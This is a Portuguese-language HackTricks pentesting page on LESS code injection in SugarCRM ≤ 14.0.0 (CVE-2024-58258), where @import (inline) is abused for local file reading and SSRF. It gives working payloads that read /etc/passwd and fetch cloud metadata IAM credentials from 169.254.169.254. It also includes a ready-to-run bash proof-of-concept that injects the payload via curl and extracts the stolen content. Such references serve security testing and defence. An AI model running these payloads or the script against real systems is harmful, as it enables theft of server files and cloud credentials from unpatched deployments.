Injeção de Código LESS levando a SSRF & leitura de arquivos locais

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

LESS é um pré-processador CSS popular que adiciona variáveis, mixins, funções e a poderosa diretiva @import. Durante a compilação o compilador LESS irá buscar os recursos referenciados nas instruções @import e incorporar (“inline”) seus conteúdos no CSS resultante quando a opção (inline) for usada.

Quando uma aplicação concatena entrada controlada pelo usuário em uma string que é posteriormente analisada pelo compilador LESS, um atacante pode injetar código LESS arbitrário. Ao abusar de @import (inline) o atacante pode forçar o servidor a recuperar:

• Arquivos locais via o protocolo file:// (divulgação de informações / Local File Inclusion).
• Recursos remotos em redes internas ou serviços de metadata de cloud (SSRF).

Essa técnica foi observada em produtos do mundo real, como SugarCRM ≤ 14.0.0 (/rest/v10/css/preview endpoint).

Exploração

1. Identifique um parâmetro que é incorporado diretamente dentro de uma string de stylesheet processada pelo compilador LESS (por exemplo, ?lm= no SugarCRM).
2. Feche a declaração atual e injete novas diretivas. Os primitivos mais comuns são:

• ; – termina a declaração anterior.
• } – fecha o bloco anterior (se necessário).

3. Use @import (inline) '<URL>'; para ler recursos arbitrários.
4. Opcionalmente injete um marcador (data: URI) após o import para facilitar a extração do conteúdo buscado do CSS compilado.

Leitura de Arquivos Locais

1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //

O conteúdo de /etc/passwd aparecerá na resposta HTTP logo antes do marcador @@END@@.

SSRF – Cloud Metadata

1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //

PoC automatizada (exemplo SugarCRM)

#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd

TARGET="$1"        # Base URL of SugarCRM instance
RESOURCE="$2"      # file:// path or URL to fetch

INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")

curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'

Casos Reais

Referências

• SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability
• SugarCRM Security Advisory SA-2024-059
• CVE-2024-58258

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.